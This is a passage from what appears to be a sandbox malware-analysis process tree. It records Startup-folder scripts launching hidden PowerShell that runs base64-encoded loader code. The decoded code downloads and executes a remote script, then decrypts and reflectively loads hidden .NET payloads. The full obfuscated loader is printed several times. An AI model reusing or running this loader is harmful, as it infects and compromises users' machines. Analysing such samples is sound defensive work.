0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3640 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7240 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6492 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3340 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5996 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz